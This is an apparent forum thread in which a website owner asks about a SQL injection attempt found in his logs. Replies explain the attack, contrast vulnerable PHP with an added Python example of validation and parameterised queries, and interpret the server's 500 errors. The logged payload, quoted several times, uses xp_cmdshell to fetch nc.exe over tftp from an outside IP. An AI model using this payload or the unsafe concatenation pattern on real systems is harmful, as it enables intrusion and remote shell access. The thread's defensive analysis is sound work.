
Website Attack???


Mighty

Programmer
Feb 22, 2001
1,682
US
Hi Folks,

I'm not sure if I am entering this in the correct forum but I'll give it a try. I have a script which monitors my website logfiles looking for anything strange. In last night's logfiles, I noticed that someone entered the following querystring at the end of one of my page URLs:

action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--&type=Peripheral

This to me looks like someone was trying to execute a script on my website - start a shell script, ftp a file and run it.

How do I guard against something like that?

Mighty
 
One possibility is that they are just appending it in the hope of creating a SQL Injection attack. Make sure that you are using Stored Procedures when running queries on your database to protect against these types of attacks.


____________________________________________________________

Need help finding an answer?

Try the Search Facility or read FAQ222-2244 on how to get better results.

 
He's trying a SQL injection technique on you. Look at this specific part of the URL:
Code:
id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--
This is attempting to end the current SQL query and, using the semi-colon, add in new commands.

Personally, I would just look at your SQL code server-side and make sure that you are testing any script inputs (in this case, GET inputs).

Here is an example of some BAD server-side (PHP) code that would get tripped up by that URL:
Code:
$id = $_GET['id'];
$sql_statement = "SELECT * FROM tablename WHERE id=$id";
This could be rewritten to test that $id is a number (and doesn't contain any other characters) for instance. As it is right now, the contents of $id contain:
Code:
1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--
and the resulting SQL code would look like this:
Code:
SELECT * FROM tablename WHERE id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--

Here is a good URL that discusses this and can help in defending against such:
Cheers,
Jeff

Jeff's Page @ Code Couch

What is Javascript? FAQ216-6094
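As an added Python example (not the thread's own code, and not Jeff's PHP): the same concatenation pattern fed the actual query string from the thread, the numeric whitelist check Jeff suggests, and a parameterised query for comparison. SQLite stands in for Access here, which is an assumption; the web server has already decoded %20 to spaces by the time the script sees the value.

```python
import re
import sqlite3
from urllib.parse import unquote

# The query string seen in the thread's log, embedded here as constructed test input.
QUERY_STRING = ("action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77"
                "%20get%20nc.exe%20c:\\nc.exe';--&type=Peripheral")

def get_param(query_string, name):
    """Return one URL-decoded parameter; %20 becomes a space, as the web server would do."""
    for pair in query_string.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return ""

def build_query_unsafely(raw_id):
    """The concatenation pattern from the PHP snippet: request text lands inside the SQL."""
    return f"SELECT * FROM tablename WHERE id={raw_id}"

def run_unsafely(conn, raw_id):
    """Execute the concatenated statement; returns rows, or the driver's error text if rejected."""
    try:
        return conn.execute(build_query_unsafely(raw_id)).fetchall()
    except (sqlite3.Error, sqlite3.Warning) as exc:  # older Pythons raise Warning here
        return f"rejected: {exc}"

def is_valid_id(raw_id):
    """Whitelist check from the thread: id must be a plain decimal integer, nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None

def lookup_product(conn, raw_id):
    """Hardened path: validate first, then bind the value as a parameter, never concatenate."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be numeric")
    return conn.execute("SELECT id, name FROM tablename WHERE id = ?", (int(raw_id),)).fetchall()

def make_db():
    """In-memory stand-in for the Access table (assumed schema, constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tablename (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO tablename VALUES (?, ?)", [(1, "Printer"), (2, "Scanner")])
    return conn

if __name__ == "__main__":
    conn = make_db()
    hostile = get_param(QUERY_STRING, "id")
    print(build_query_unsafely(hostile))  # the second statement is now part of the SQL
    print(run_unsafely(conn, hostile))    # SQLite, like Access, refuses the trailing text
    print(lookup_product(conn, "2"))      # validated and parameterised lookup
```

Access rejected the extra statement ("Characters found after end of SQL statement"), which is exactly what the 500 in the log shows; the fix is to make sure the value never reaches the SQL string in the first place.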
 
Guys,

Thanks for the responses. Does this SQL injection work with any particular database or will it work with any database?

In particular, I mostly use Microsoft Access. Will this type of "attack" work with MS Access?

Mighty
 
Hi

Mighty said:
Does this SQL injection work with any particular database or will it work with any database?
In fact SQL injection does not work on the database itself; it works on the code written by lazy programmers who do not escape the special characters in the received data before including them in SQL commands. So yes, any database can be affected/destroyed with this.

Feherke.
 
When I actually tried to replicate the problem by adding the querystring to my URL and executing it, I get a "Page cannot be displayed" error.

Does this mean that the SQL Injection didn't work?

Mighty
 
Thanks for the pointers guys.

Mighty
 
Hi Wullie,

Whereabouts in the error log? I just tried loading the web page using IE6 with the code above appended to the end of the URL and I get a "Page cannot be displayed" error in the browser.

Mighty
 
Find the section in the log where you got the following from:

Code:
action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--&type=Peripheral

There should be quite a few other strings on the same line as this and that shows what response the server gave. If you copy the full line from the log for this request then we can say for sure whether it did run or not.

When you run it, it seems to have failed but that doesn't mean it failed for all of the requests made. (Assuming it was more than 1 request, which it normally would be)

Hope this helps

Wullie

Fresh Look - Quality Coldfusion 7/Windows Hosting
YetiHost - Coming Soon

The pessimist complains about the wind. The optimist expects it to change. The leader adjusts the sails. - John Maxwell
 
When it was done yesterday, the two lines from the logfiles are:

Code:
2006-05-01 19:48:05 195.10.20.12 GET /oemproducts.asp action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--|52|80040e14|[Microsoft][ODBC_Microsoft_Access_Driver]_Characters_found_after_end_of_SQL_statement. 80 - 84.26.250.77 curl/7.15.3+(i586-pc-mingw32msvc)+libcurl/7.15.3+zlib/1.2.2 500 0 0

Code:
2006-05-01 19:48:05 195.10.20.12 GET /oemproducts.asp action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--&type=Peripheral|52|80040e14|[Microsoft][ODBC_Microsoft_Access_Driver]_Characters_found_after_end_of_SQL_statement. 80 - 84.26.250.77 curl/7.15.3+(i586-pc-mingw32msvc)+libcurl/7.15.3+zlib/1.2.2 500 0 0

Does this tell you anything?

Mighty
 
Your server returned a 500 internal error for the requests above, meaning your code is not filtering the request properly as it did reach the database. Luckily though your database rejected the SQL. You need to get some filtering in to ensure the integrity of the data being passed to the database.

Hope this helps

Wullie

Fresh Look - Quality Coldfusion 7/Windows Hosting
YetiHost - Coming Soon

The pessimist complains about the wind. The optimist expects it to change. The leader adjusts the sails. - John Maxwell
 